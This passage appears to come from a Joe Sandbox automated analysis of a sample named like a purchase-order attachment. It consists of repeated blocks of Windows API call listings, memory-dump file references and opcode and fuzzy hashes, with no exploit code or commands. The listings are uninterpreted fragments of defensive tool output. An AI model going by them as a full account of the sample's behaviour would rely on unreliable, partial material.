                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3137044355-0
                                                                                                                                                                                                      • Opcode ID: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
                                                                                                                                                                                                      • Instruction ID: edd6db39d660dcb4e0c32f863c5204c469b601a469209fca3a932210d4679436
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0cd12355e3132ddb083e152e96d740e52cdadc459700f0ffee6bc6ccb3138cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5021B471900208EFEB20DF95DC89ADBBBB8EF40704F00846EE61792150D778EA65DF59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00446733
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00446754
                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004467A6
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004467AF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1157408455-0
                                                                                                                                                                                                      • Opcode ID: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
                                                                                                                                                                                                      • Instruction ID: 8b91472a63e09bb99e4025de3935e9e18f15fd5f322b2290e887984ed070b48b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57569ce16a0975a2dbef6d9475e3719aebf367813c675b98e9dbb44cfd24af0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5110A71D022287AE73067A5AC4DFAFBBBCEF45764F1045AAF904E71D0D2744E808B69
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
                                                                                                                                                                                                        • Part of subcall function 0043AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
                                                                                                                                                                                                        • Part of subcall function 0043AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
                                                                                                                                                                                                        • Part of subcall function 0043AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
                                                                                                                                                                                                        • Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,0043ADE4,?,?), ref: 0043B21B
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0043B227
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0043B22E
                                                                                                                                                                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 0043B247
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4217664535-0
                                                                                                                                                                                                      • Opcode ID: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
                                                                                                                                                                                                      • Instruction ID: 573796cad2db7ff1302e17eb1794f716ba6f0da4f155cbbcd395141fd52a3640
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD11BF71A00205AFDB049F94DC88FAFB7B9EF89318F14946FEA4297250D739AE44CB54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0043B498
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4AA
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4C0
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4DB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                      • Opcode ID: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
                                                                                                                                                                                                      • Instruction ID: 8899dad3a5a672da7911a65e4843f6e45b4eb2c78a03a80d9270399c9af6d800
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604B7290D771AE11DB98
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5
                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0047E69A
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0047E6A4
                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0047E6AF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                      • Opcode ID: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
                                                                                                                                                                                                      • Instruction ID: 8a38cf26b2289de6e14f6fa3ca0c761f9cf1d87495578927ec2939f6d18f8468
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67ac9f4910a2dd253858acbbaaaecb0b8e2d9fabf8ddc0337399032a92a3f85b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F114831A01029BFCB10DF95DC459EE77B9EF09308F40486AF901E7241D338AA92CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00447352
                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00447385
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0044739B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004473A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                      • Opcode ID: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
                                                                                                                                                                                                      • Instruction ID: 65718a7269fcb76229fcf2b12d524195cd6f7c0b01429baa910b87b3e570ebb2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1911E572A04214ABDB019FAC9C05E9E7BA99B48311F14426AFC21D3291D7748D019BA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0041D1CE
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                      • Opcode ID: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
                                                                                                                                                                                                      • Instruction ID: 20e8855dbb7d0dd181b5275668110b09493867f9601d5c4c54c49d70e43e613b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4111C4B2901509BFEF125F90DC54EEB7B69FF08364F044116FA0552150C735DCA0DBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AF15D8,00000000,00000000,?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue), ref: 00AF21BD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue,00B06FC4,FlsSetValue,00000000,00000364,?,00AF192D), ref: 00AF21C9
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AF2132,00AF15D8,00000000,00000000,00000000,?,00AF2283,00000006,FlsSetValue,00B06FC4,FlsSetValue,00000000), ref: 00AF21D7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                      • Opcode ID: 56fd52f87146f362977e9b2eafd77492e1cb14d7156d2285c3758c1ac5b55d3e
                                                                                                                                                                                                      • Instruction ID: 9e050bca18593d3673dd78942eedae9a8ea48250e1da78b5a125856666118826
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56fd52f87146f362977e9b2eafd77492e1cb14d7156d2285c3758c1ac5b55d3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D01F77260122AABC7218BE8EC44BB67B9CAF15BA0B210720FB19D3140DB24D801C7F8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                      • Instruction ID: e217e9a68c89cc3a703717b2c0a853f5b8c9668b7614545f64a0a403a3b518ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC014C3200014EBBCF125E84DC028EE3F23BB5C355F589456FE1859135D33AEAB2AB89
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00427A0D: __getptd_noexit.LIBCMT ref: 00427A0E
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042748F
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004274AC
                                                                                                                                                                                                      • _free.LIBCMT ref: 004274BF
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00BEB880), ref: 004274D7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2704283638-0
                                                                                                                                                                                                      • Opcode ID: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
                                                                                                                                                                                                      • Instruction ID: de51e5ee548e769ed021d111760f6c39ee054f2497822ded0c01ceae259c3d71
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85fa5979924f29de3294b51c57e7de164a3bbaac4adaaf32aa5e59ef576da78
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D018E31B06631A7C711BF66B80575EBB60BF04714F95411FE81563690C72C6911CBDE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
                                                                                                                                                                                                        • Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
                                                                                                                                                                                                        • Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
                                                                                                                                                                                                        • Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033
                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EA8E
                                                                                                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 0046EA9B
                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 0046EAAB
                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 0046EAB9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                      • Opcode ID: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
                                                                                                                                                                                                      • Instruction ID: 7d6768de46838a1e0420bdc3075050136730bf049448a9ce4948047e77d7b045
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF0BE31502259BBDB12AF94AC0DFCE3F5AAF06314F044216FA01640F183785562CB9E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0043C864
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 0043C86B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                      • Opcode ID: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
                                                                                                                                                                                                      • Instruction ID: be0358667f426e6c30f78aba5f721580d23a9c17b88f7cc5dcbf179fbb72207b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10E0657154222876DB102BA2DC4DEDF7F1CEF157A1F008425B50DA4490D775C581CBE4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0043B0D6
                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0DD
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0043AC9D), ref: 0043B0EA
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0F1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
